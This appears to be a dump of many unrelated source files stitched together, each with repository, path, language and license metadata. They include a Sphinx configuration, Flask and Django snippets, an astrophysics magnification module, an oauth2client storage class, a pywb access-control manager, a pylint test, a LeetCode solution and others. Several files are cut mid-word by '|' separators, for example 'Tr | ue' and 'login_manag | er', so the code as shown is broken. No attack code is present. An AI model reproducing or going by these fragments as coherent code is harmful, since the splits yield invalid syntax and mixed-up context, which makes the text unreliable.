# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'github_user': 'goldsborough',
'github_repo': 'ecstasy',
'github_banner': True,
'travis_button': "true",
'gratipay_user': "goldsborough",
'extra_nav_links': {"Github Repository": "github.com/goldsborough/ecstasy"}
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [alabaster.get_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "ecstasy"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = Tr
|
ue
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_in
|
dex = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ecstasydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ecstasy.tex', u'ecstasy Documentation',
u'Peter Goldsborough', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not c
|
jtannas/NOA
|
app/mod_auth/__init__.py
|
Python
|
mit
| 613
| 0.001631
|
''' Initiation procedure for the auth module
Yields:
-
|
Initiates the Login Manager
'''
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from flask_login import LoginManager
from .. import app
# ---------------------------------------------------------------------------
# Define and Configure the login manager
# ---------------------------------------------------------------------------
login_manag
|
er = LoginManager()
login_manager.login_view = "auth.signin"
login_manager.init_app(app)
|
andymitrich/pygask
|
application/views.py
|
Python
|
mit
| 88
| 0.011364
|
from flask import render_template
def home():
return re
|
nder_temp
|
late('index.html')
|
MilyMilo/sci-organizer
|
agenda/migrations/0001_initial.py
|
Python
|
mit
| 1,029
| 0.002915
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('groups', '0001_initial'),
]
operations =
|
[
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', mo
|
dels.CharField(max_length=30)),
('description', models.TextField()),
('subject', models.CharField(max_length=20)),
('event_type', models.CharField(choices=[('quiz', 'Quiz'), ('test', 'Test'), ('homework', 'Homework')], max_length=8)),
('due', models.DateTimeField()),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='groups.Group')),
],
),
]
|
muLAn-project/muLAn
|
muLAn/models/fhexaBL.py
|
Python
|
mit
| 2,911
| 0.003435
|
# -*-coding:Utf-8 -*
# ====================================================================
# ====================================================================
# Packages
# ====================================================================
import sys
import numpy as np
from muLAn.models.multipole import hexamag
# ====================================================================
# Functions
# ====================================================================
def magnifcalc(t, param, Ds=None, tb=None):
"""Return the hexadecapolar approximation of the magnification."""
### Get parameters
t0 = param['t0']
u0 = param['u0']
tE = param['tE']
rho = param['rho']
gamma = param['gamma']
q = param['q']
piEN = param['piEN']
piEE = param['piEE']
alpha0 = param['alpha']
s0 = param['s']
dalpha = param['dadt']
ds = param['dsdt']
### Lens orbital motion
alpha, s = lens_rotation(alpha0, s0
|
, dalpha, ds, t, tb)
### Parallax
DsN = Ds['N']
|
DsE = Ds['E']
tau = (t-t0)/tE + piEN * DsN + piEE * DsE
beta = u0 + piEN * DsE - piEE * DsN
x, y = binrot(alpha, tau, beta)
### Conversion center of mass to Cassan (2008)
x = x - s*q/(1.+q)
### Compute magnification
zeta0 = x + 1j*y
return np.array([hexamag(s[i], q, rho, gamma, zeta0[i]) for i in range(len(x))])
# --------------------------------------------------------------------
def binrot(theta, x_old, y_old):
"""Rotation by an angle alpha.
:param theta: float, angle in radians.
:param x_old: numpy array, x coodinate in the old frame.
:param y_old: numpy array, y coodinate in the old frame.
:return x_new: numpy array, x coodinate in the new frame.
:return y_new: numpy array, y coodinate in the new frame.
"""
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
x_new = x_old * cos_theta - y_old * sin_theta
y_new = x_old * sin_theta + y_old * cos_theta
return x_new, y_new
# --------------------------------------------------------------------
def lens_rotation(alpha0, s0, dalpha, ds, t, tb):
"""Compute the angle alpha and projected separation s for each
time step due to the lens orbital motion.
:param alpha0: angle alpha at date tb.
:param s0: projected separation at date tb.
:param dalpha: float, angular velocity at date tb
(radians.year^-1).
:param ds: change rate of separation (year^-1).
:param t: list of dates.
:param tb: time reference for linear development.
:type alpha0: float
:type s0: float
:type dalpha: float
:type ds: float
:type t: numpy array
:type tb: float
:return: unpacked list of actual alpha and s values at each date.
:rtype: numpy array, numpy array
"""
Cte_yr_d = 365.25 # Julian year in days
alpha = alpha0 - (t - tb) * dalpha / Cte_yr_d
s = s0 + (t-tb) * ds / Cte_yr_d
return alpha, s
|
samuelclay/NewsBlur
|
vendor/oauth2client/django_orm.py
|
Python
|
mit
| 4,342
| 0.008521
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 utilities for Django.
Utilities for using OAuth 2.0 in conjunction with
the Django datastore.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import oauth2client
import base64
import pickle
from django.db import models
from oauth2client.client import Storage as BaseStorage
class CredentialsField(models.Field):
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(CredentialsField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def from_db_value(self, value, expression, connection):
if value is None:
return value
return pickle.loads(base64.b64decode(value))
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Credentials):
return value
return pickle.loads(base64.b64decode(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs['null']
return name, path, args, kwargs
class FlowField(models.Field):
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(FlowField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Flow):
return value
return pickle.loads(base64.b64decode(value))
def from_db_value(self, value, expression, connection):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs['null']
return name, path, args, kwargs
class Storage(BaseStorage):
"""Store and retrieve a single credential to and from
the datastore.
This Storage helper presumes the Credentials
have been stored as a CredenialsField
on a db model class.
"""
def __init__(self, model_class, key_name, key_value, property_name):
"""Constructor for Storage.
Args:
model: db.Model, model class
key_name: string, key name for the entity that has the credentials
key_value: string, key value for the entity that has the credentials
property_name: string, name of the property that is an CredentialsProperty
"""
self.model_class = model_class
self.key_name = key_name
self.key_value = key_value
self.property_name = property_name
def locked_get(self):
"""Retrieve Credential from datastore.
Returns:
oauth2client.Credentials
"""
credential = None
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query)
if len(entities) > 0:
credential = getattr(entities[0], self.property_name)
if credential and hasattr(credential, 'set_store'):
credential.set_store(self)
return credential
def locked_put(self, credentials)
|
:
"""Write a Credentials to the datastore.
Args:
credentials: Credentials, the credentials to store.
"""
args = {self.key_name: self.key_value}
entity = sel
|
f.model_class(**args)
setattr(entity, self.property_name, credentials)
entity.save()
def locked_delete(self):
"""Delete Credentials from the datastore."""
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query).delete()
|
ikreymer/pywb
|
pywb/manager/aclmanager.py
|
Python
|
gpl-3.0
| 10,869
| 0.001012
|
import os
import re
import sys
from pywb.manager.manager import CollectionsManager
from pywb.utils.canonicalize import canonicalize
from pywb.warcserver.access_checker import AccessChecker
from pywb.warcserver.index.cdxobject import CDXObject
# ============================================================================
class ACLManager(CollectionsManager):
SURT_RX = re.compile('([^:.]+[,)])+')
VALID_ACCESS = ('allow', 'block', 'exclude')
DEFAULT_FILE = 'access-rules.aclj'
def __init__(self, r):
"""
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
self.rules = []
coll_name = r.coll_name
if not self.is_valid_auto_coll(r.coll_name):
coll_name = ''
self.target = r.coll_name
super(ACLManager, self).__init__(coll_name, must_exist=False)
self.acl_file = None
def process(self, r):
"""
Process acl command
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
# if target exists as a file, use that
if os.path.isfile(self.target):
self.acl_file = self.target
# otherwise, if auto collection, use default file in ./collections/<coll>/acl/<DEFAULT_FILE>
elif os.path.isdir(self.curr_coll_dir):
self.acl_file = os.path.join(self.acl_dir, self.DEFAULT_FILE)
# else, assume filename (may not exist yet)
else:
self.acl_file = self.target
# for add/import, file doesn't have to exist
if r.op in ('add', 'importtxt'):
self.load_acl(False)
# for other ops (except matching), ensure entire file loads successfully, log errors
elif r.op not in ('match'):
if not self.load_acl(True):
sys.exit(2)
return
# if 'validate', the command itself is validation
if r.op != 'validate':
self.validate()
r.acl_func(self, r)
def is_valid_auto_coll(self, coll_name):
"""Returns T/F indicating if the supplied collection name
is a valid collection
:param coll_name: The collection name to check
:return: T/F indicating a valid collection
:rtype: bool
"""
if not self.COLL_RX.match(coll_name):
return False
if not os.path.isdir(os.path.join(self.COLLS_DIR, coll_name)):
return False
return True
def load_acl(self, must_exist=True):
"""Loads the access control list
:param bool must_exist: Does the acl file have to exist
:return: T/F indicating load success
:rtype: bool
"""
try:
with open(self.acl_file, 'rb') as fh:
for line in fh:
if line:
self.rules.append(CDXObject(line))
return True
except IOError as io:
if must_exist:
print('Error Occured: ' + str(io))
return False
except Exception as e:
print('Error Occured: ' + str(e))
return False
def save_acl(self, r=None):
"""Save the contents of the rules as cdxj entries to
the access control list file
:param argparse.Namespace|None r: Not used
:rtype: None
"""
try:
os.makedirs(os.path.dirname(self.acl_file))
except OSError:
pass
try:
with open(self.acl_file, 'wb') as fh:
for acl in self.rules:
fh.write(acl.to_cdxj().encode('utf-8'))
except Exception as e:
print('Error Saving ACL Rules: ' + str(e))
def to_key(self, url_or_surt, exact_match=False):
""" If 'url_or_surt' already a SURT, use as is
If exact match, add the exact match suffix
:param str url_or_surt: The url or surt to be converted to an acl key
:param bool exact_match: Should the exact match suffix be added to key
:rtype: str
"""
if self.SURT_RX.search(url_or_surt):
result = url_or_surt
else:
result = canonicalize(url_or_surt)
if exact_match:
result += AccessChecker.EXACT_SUFFIX
return result
def validate_access(self, access):
"""Returns true if the supplied access value is valid
otherwise terminates the process
:param str access: The access value to be validated
:return: True if valid
:rtype: bool
"""
if access not in self.VALID_ACCESS:
print('Valid access values are: ' + ', '.join(self.VALID_ACCESS))
sys.exit(1)
return True
def add_rule(self, r):
"""Adds a rule the ACL manager
:param argparse.Namespace r: The argparse namespace representing the rule to be added
:rtype: None
"""
return self._add_rule(r.url, r.access, r.exact_match)
def _add_rule(self, url, access, exact_match=False):
"""Adds an rule to the acl file
:param str url: The URL for the rule
:param str access: The access value for the rule
:param bool exact_match: Is the rule to be added an exact match
:rtype: None
"""
if not self.validate_access(access):
return
acl = CDXObject()
acl['urlkey'] = self.to_key(url, exact_match)
acl['timestamp'] = '-'
acl['access'] = access
acl['url'] = url
i = 0
replace = False
for rule in self.rules:
if acl['urlkey'] == rule['urlkey'] and acl['timestamp'] == rule['timestamp']:
replace = True
break
if acl > rule:
break
i += 1
if replace:
print('Existing Rule Found, Replacing:')
self.print_rule(self.rules[i])
print('with:')
self.print_rule(acl)
self.rules[i] = acl
else:
print('Added new Rule:')
self.print_rule(acl)
|
self.rules.insert(i, acl)
self.save_acl()
def validate_save(self, r=None, log=False):
"""Validates the acl rules and saves the file
|
:param argparse.Namespace|None r: Not used
:param bool log: Should a report be printed to stdout
:rtype: None
"""
self.validate(log=log, correct=True)
def validate(self, log=False, correct=False):
"""Validates the acl rules returning T/F if the list should be saved
:param bool log: Should the results of validating be logged to stdout
:param bool correct: Should invalid results be corrected and saved
:rtype: None
"""
last_rule = None
out_of_order = False
for rule in self.rules:
if last_rule and rule > last_rule:
out_of_order = True
break
last_rule = rule
if out_of_order:
if log:
print('Rules out of order, resorting')
if correct:
self.rules.sort(reverse=True)
self.save_acl()
elif log:
print('Rules in order')
def remove_rule(self, r):
"""Removes a rule from the acl file
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
i = 0
urlkey = self.to_key(r.url, r.exact_match)
for rule in self.rules:
if urlkey == rule['urlkey']:
acl = self.rules.pop(i)
print('Removed Rule:')
self.print_rule(acl)
self.save_acl()
return
i += 1
print('Rule to remove not found!')
def list_rules(self, r):
"""Print the acl rules to the stdout
:param argparse.Namespace|None r: Not used
:rtype: None
"""
print('Rules for {0} from {1}:'.format(self.target, self.acl_file))
print('')
for rule in self.rules:
sys.stdout.write(rule.to_c
|
ruchee/vimrc
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/c/condition_evals_to_constant.py
|
Python
|
mit
| 1,666
| 0.001801
|
"""Test that boolean conditions simplify to a constant value"""
# pylint: disable=pointless-statement
from unknown import Unknown # pylint: disable=import-error
def func(_):
"""Pointless function"""
CONSTANT = 100
OTHER = 200
# Simplifies any boolean expression that is coerced into a True/False value
bool(CONSTANT or True) # [condition-evals-to-constant]
assert CONSTANT or True # [condition-evals-to-constant]
if CONSTANT and False: # [condition-evals-to-constant]
pass
elif CONSTANT and False: # [condition-evals-to-constant]
pass
while CONSTANT and False: # [condition-evals-to-constant]
break
1 if
|
CONSTANT or True else 2 # [condition-evals-to-constant]
z = [x for x in range(10) if x or True] # [condition
|
-evals-to-constant]
# Simplifies recursively
assert True or CONSTANT or OTHER # [condition-evals-to-constant]
assert (CONSTANT or True) or (CONSTANT or True) # [condition-evals-to-constant]
# Will try to infer the truthiness of an expression as long as it doesn't contain any variables
assert 3 + 4 or CONSTANT # [condition-evals-to-constant]
assert Unknown or True # [condition-evals-to-constant]
assert True or True # [condition-evals-to-constant]
assert False or False # [condition-evals-to-constant]
assert True and True # [condition-evals-to-constant]
assert False and False # [condition-evals-to-constant]
# A bare constant that's not inside of a boolean operation will emit `using-constant-test` instead
if True: # pylint: disable=using-constant-test
pass
# Expressions not in one of the above situations will not emit a message
CONSTANT or True
bool(CONSTANT or OTHER)
bool(func(CONSTANT or True))
|
rootio/rootio_web
|
alembic/versions/31d36774c549_first_and_second_sim.py
|
Python
|
agpl-3.0
| 673
| 0.007429
|
"""split gsm signal in two analytics, one per sim card
Revision ID: 31d36774c549
Revises: 528f90a47515
Create Date: 2019-01-23 15:16:58.514742
"""
# revision identifiers, used by Alembic.
revision = '31d36774c549'
down_revision = '528f90a47515'
from alemb
|
ic import op
import sqlalchemy as sa
def upgrade():
op.alter_column('radio_stationanalytic', 'gsm_signal', new_
|
column_name='gsm_signal_1')
op.add_column('radio_stationanalytic', sa.Column('gsm_signal_2', sa.Integer(), nullable=True))
def downgrade():
op.alter_column('radio_stationanalytic', 'gsm_signal_1', new_column_name='gsm_signal')
op.drop_column('radio_stationanalytic', 'gsm_signal_2')
|
pafluxa/todsynth
|
build/lib.linux-x86_64-2.7/todsynth/calibration/calibrator.py
|
Python
|
gpl-3.0
| 2,810
| 0.025267
|
import todsynth
import os
import numpy
import json
import pandas
class Calibrator( object ):
'''
A todsynth.calibrator object is a container that stores coefficients
that transform RAW dac units to physical units for a given TOD.
'''
# Calibrator description.
#000000000000000000000000000000000000000000000000000000000000000000000000
name = ""
description = ""
calType = ""
# Information stored in the form of a dictionary. Careful not to abuse
# of this in the sense of using it to process data!
info = {}
#000000000000000000000000000000000000000000000000000000000000000000000000
# Calibration coefficients
coeffs = numpy.empty(0)
# Detector index to Unique Identifier array
__uid = numpy.empty(0)
def __init__( self ):
'''
self.name = name
self.description = descrp
self.calType = calType
'''
def setCoeffs( self, c , uid=None ):
'''
Set calibrator coefficients to c.
'''
# Perform numpy.copy() to avoid cross referencing stuff
self.__coeffs = numpy.copy( c )
if uid is not None:
self.__uid = numpy.copy(uid)
self.coeffs = self.coeffs[ self.__uid ]
else:
self.__uid = numpy.arange( len( self.coeffs ) )
def getCoeffs( self ):
'''
Get a *copy* of the coefficients array.
'''
return numpy.copy( self.coeffs )
def updateInfo( self, prop, value ):
'''
Update calibrator info with a pair of prop : value
'''
self.info.update( { 'prop' : value } )
def storeInPath( self , outPath ):
'''
Stores the calibrator in JSON format at the specified path.
'''
# Serialize this object
data = {
'coefficients' : self.__coeffs,
'uid' : self.__uid }
# Create PANDAS DataFrame out data
df = pandas.DataFrame( data )
# Save DataFrame to HDF5 format
df.to_csv( os.path.join(
outPath, "%s.%s.cal" % (self.name,self.calType) ),
index=False,
sep=' ',
header=True )
@classmethod
def readFromPath( cls, systemPath ):
'''
'''
self = cls()
name,caltype,_ = os.path.basename( systemPath ).split('.')
self.name = name
self.ca
|
lType = caltype
self.description = ''
# Load file
calDF = pandas.read_csv(
systemPath,
header=0,
names=['coefficients', 'uid'],
delimiter=' ' )
self.setCoeffs( calDF['coefficients'], uid = ca
|
lDF['uid'] )
return self
|
DMSC-Instrument-Data/lewis
|
src/lewis/core/devices.py
|
Python
|
gpl-3.0
| 19,330
| 0.004656
|
# -*- coding: utf-8 -*-
# *********************************************************************
# lewis - a library for creating hardware device simulators
# Copyright (C) 2016-2017 European Spallation Source ERIC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# *********************************************************************
|
"""
This module contains :class:`DeviceBase` as a base class for other device classes and
infrastructure that can import devices from a module (:class:`DeviceRegistry`). The latter also
produces factory-like objects that create device instances and interfaces based on setups
(:class:`DeviceBuilder`).
"""
import importlib
from lewis import __version__
from lewis.core.exceptions import LewisException
from lewis.core.logging import has_log
from lewis.core.utils import get
|
_submodules, get_members, is_compatible_with_framework
@has_log
class DeviceBase(object):
"""
This class is a common base for :class:`~lewis.devices.Device` and
:class:`~lewis.devices.StateMachineDevice`. It is mainly used in the device
discovery process.
"""
@has_log
class InterfaceBase(object):
"""
This class is a common base for protocol specific interfaces that are exposed by a subclass of
:class:`~lewis.core.adapters.Adapter`. This base class is not meant to be used directly in
a device package - this is what the interfaces in :mod:`lewis.adapters` are for.
There is a 1:1 correspondence between device and interface, where the interface holds a
reference to the device. It can be changed through the ``device``-property.
"""
protocol = None
def __init__(self):
super(InterfaceBase, self).__init__()
self._device = None
@property
def adapter(self):
"""
Adapter type that is required to process and expose interfaces of this type. Must be
implemented in subclasses.
"""
raise NotImplementedError('An interface type must specify which adapter it is compatible '
'with. Please implement the adapter-property.')
@property
def device(self):
"""
The device this interface is bound to. When a new device is set, :meth:`_bind_device` is
called, where the interface can react to the device change if necessary.
"""
return self._device
@device.setter
def device(self, new_device):
self._device = new_device
self._bind_device()
def _bind_device(self):
"""
This method should perform any binding steps between device and interface. The result
of this binding step is generally used by the adapter to process network traffic.
The default implementation does nothing.
"""
pass
def is_device(obj):
"""
Returns True if obj is a device type (derived from DeviceBase), but not defined in
:mod:`lewis.core.devices` or :mod:`lewis.devices`.
:param obj: Object to test.
:return: True if obj is a device type.
"""
return isinstance(obj, type) and issubclass(
obj, DeviceBase) and obj.__module__ not in ('lewis.devices', 'lewis.core.devices')
def is_interface(obj):
"""
Returns True if obj is an interface (derived from :class:`InterfaceBase`), but not defined in
:mod:`lewis.adapters`, where concrete interfaces for protocols are defined.
:param obj: Object to test.
:return: True if obj is an interface type.
"""
return isinstance(obj, type) and issubclass(
obj, InterfaceBase) and not (
obj.__module__.startswith('lewis.core.devices') or obj.__module__.startswith(
'lewis.adapters'))
@has_log
class DeviceBuilder(object):
"""
This class takes a module object (for example imported via importlib.import_module or via the
:class:`DeviceRegistry`) and inspects it so that it's possible to construct devices and
interfaces.
In order for the class to work properly, the device module has to adhere to a few rules.
Device types, which means classes inheriting from :class:`DeviceBase`, are imported directly
from the device module, equivalent to the following:
.. sourcecode :: Python
from device_name import SimulatedDeviceType
If ``SimulatedDeviceType`` is defined in the ``__init__.py``, there's nothing else to do. If
the device class is defined elsewhere, it must be imported in the ``__init__.py`` file as
written above. If there is only one device type (which is probably the most common case), it is
assumed to be default device type.
Setups are discovered in two locations, the first one is a dict called ``setups`` in the device
module, which must contain setup names as keys and as values again a dict. This inner dict has
one mandatory key called ``device_type`` and one optional key ``parameters`` containing the
constructor arguments for the specified device type:
.. sourcecode:: Python
setups = dict(
broken=dict(
device_type=SimulatedDeviceType,
parameters=dict(
override_initial_state='error',
override_initial_data=dict(
target=-10, position=-20.0))))
The other location is a sub-package called `setups`, which should in turn contain modules. Each
module must contain a variable ``device_type`` and a variable ``parameters`` which are
analogous to the keys in the dict described above. This allows for more complex setups which
define additional classes and so on.
The ``default`` setup is special, it is used when no setup is supplied to
:meth:`create_device`. If the setup ``default`` is not defined, one is created with the default
device type. This has two consequences, no setups need to be defined for very simple devices,
but if multiple device types are defined, a ``default`` setup must be defined.
A setup can be supplied to the :meth:`create_device`.
Lastly, the builder tries to discover device interfaces, which are currently classes based on
:class:`lewis.adapters.InterfaceBase`. These are looked for in the module and in a sub-package
called ``interfaces`` (which should contain modules with adapters like the ``setups`` package).
Each interface has a protocol, if a protocol occurs more than once in a device module,
a RuntimeError is raised.
"""
def __init__(self, module):
self._module = module
submodules = get_submodules(self._module)
self._device_types = self._discover_devices(submodules.get('devices'))
self._setups = self._discover_setups(submodules.get('setups'))
self._interfaces = self._discover_interfaces(submodules.get('interfaces'))
self.log.debug(
'Discovered the following items in \'%s\': Devices: %s; Setups: %s; Interfaces: %s',
self._module.__name__,
', '.join(device_t.__name__ for device_t in self._device_types),
', '.join(self._setups.keys()),
', '.join('(%s: %s)' % (k, v.__name__) for k, v in self._interfaces.items()))
def _discover_devices(self, devices_package):
devices = list(get_members(self._module, is_device).values())
if devices_package is None:
return devices
for module in get_submodules(devices_package).values():
devices += list(get_members(module, is_device).values())
return devices
def _discover_setups(self, setups_package):
setups = getattr(self._module, 'setups', {})
|
JulyKikuAkita/PythonPrac
|
cs15211/SlidingWindowMedian.py
|
Python
|
apache-2.0
| 5,180
| 0.004826
|
__source__ = 'https://leetcode.com/problems/sliding-window-median/'
# Time: O(n*logk)
# Space: O()
#
# Description: 480. Sliding Window Median
#
# Median is the middle value in an ordered integer list.
# If the size of the list is even, there is no middle value.
# So the median is the mean of the two middle value.
#
# Examples:
# [2,3,4] , the median is 3
#
# [2,3], the median is (2 + 3) / 2 = 2.5
#
# Given an array nums, there is a sliding window of size k which is moving from the very left of the array
# to the very right. You can only see the k numbers in the window.
# Each time the sliding window moves right by one position.
# Your job is to output the median array for each window in the original array.
#
# For example,
# Given nums = [1,3,-1,-3,5,3,6,7], and k = 3.
#
# Window position Median
# --------------- -----
# [1 3 -1] -3 5 3 6 7 1
# 1 [3 -1 -3] 5 3 6 7 -1
# 1 3 [-1 -3 5] 3 6 7 -1
# 1 3 -1 [-3 5 3] 6 7 3
# 1 3 -1 -3 [5 3 6] 7 5
# 1 3 -1 -3 5 [3 6 7] 6
# Therefore, return the median sliding window as [1,-1,-1,3,5,6].
#
# Note:
# You may assume k is always valid, ie: 1 <= k <= input array's size for non-empty array.
#
# Hide Company Tags Google
# Hide Similar Problems (H) Find Median from Data Stream
#
import unittest
class Solution(object):
pass # your function here
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/sliding-window-median/solution/
TreeMap is used to implement an ordered MultiSet.
Almost the same idea of Find Median from Data Stream
https://leetcode.com/problems/find-median-from-data-stream/
Use two Heaps to store numbers. maxHeap for numbers smaller than current median,
minHeap for numbers bigger than and equal to current median.
A small trick I used is always make size of minHeap equal (when there are even numbers)
or 1 element more (when there are odd numbers) than the size of maxHeap.
Then it will become very easy to calculate current median.
Keep adding number from the right side of the sliding window and
remove number from left side of the sliding window.
And keep adding current median to the result.
# 82ms 22.97%
class Solution {
public double[] medianSlidingWindow(int[] nums, int k) {
double[] res = new double[nums.length-k+1];
TreeMap<Integer, Integer> minHeap = new TreeMap<Integer, Integer>();
TreeMap<Integer, Integer> maxHeap = new TreeMap<Integer, Integer>(Collections.reverseOrder());
int minHeapCap = k/2; //smaller heap when k is odd.
int maxHeapCap = k - minHeapCap;
for(int i=0; i< k; i++){
maxHeap.put(nums[i], maxHeap.getOrDefault(nums[i], 0) + 1);
}
int[] minHeapSize = new int[]{0};
int[] maxHeapSize = new int[]{k};
for(int i=0; i< minHeapCap; i++){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[0] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
int resIdx = 1;
for(int i=0; i< nums.length-k; i++){
int addee = nums[i+k];
if(addee <= maxHeap.keySet().iterator().next()){
add(addee, maxHeap, maxHeapSize);
} else {
add(addee, minHeap, minHeapSize);
}
int removee = nums[i];
if(removee <= maxHeap.keySet().iterator().next()){
remove(removee, maxHeap, maxHeapSize);
} else {
remove(removee, minHeap, minHeapSize);
}
//rebalance
if(minHeapSize[0] > minHeapCap){
mov
|
e1Over(minHeap, maxHeap, minHeapSize, maxHeapSize);
} else if(minHeapSize[0] < minHeapCap){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[resIdx] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
resIdx++;
}
return res;
}
public double getMedian(TreeMap<Integer, Integer> bigHeap, TreeMap<Inte
|
ger, Integer> smallHeap, int[] bigHeapSize, int[] smallHeapSize){
return bigHeapSize[0] > smallHeapSize[0] ? (double) bigHeap.keySet().iterator().next() : ((double) bigHeap.keySet().iterator().next() + (double) smallHeap.keySet().iterator().next()) / 2.0;
}
//move the top element of heap1 to heap2
public void move1Over(TreeMap<Integer, Integer> heap1, TreeMap<Integer, Integer> heap2, int[] heap1Size, int[] heap2Size){
int peek = heap1.keySet().iterator().next();
add(peek, heap2, heap2Size);
remove(peek, heap1, heap1Size);
}
public void add(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
heap.put(val, heap.getOrDefault(val,0) + 1);
heapSize[0]++;
}
public void remove(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
if(heap.put(val, heap.get(val) - 1) == 1) heap.remove(val);
heapSize[0]--;
}
}
'''
|
googleapis/python-data-fusion
|
google/cloud/data_fusion_v1/services/data_fusion/transports/base.py
|
Python
|
apache-2.0
| 8,521
| 0.001291
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
